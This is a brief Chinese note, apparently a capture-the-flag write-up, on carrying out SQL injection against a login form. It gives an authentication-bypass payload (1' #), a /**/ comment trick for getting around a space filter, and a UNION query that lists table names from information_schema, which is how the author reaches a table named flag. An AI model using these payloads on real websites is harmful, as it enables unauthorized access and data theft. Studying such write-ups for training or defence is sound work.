sql注入的步骤:先查表再查字段后查数据
输入万能密码 1' #
抓包发现报错
去掉之后发现正常,这我想到了空格绕过/**/
万能登陆密码登录
检测回显位置—得到回显位为2
查表,得表名flag,user
构造语句:select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()
查字段/列名,得列名’flag'
查数据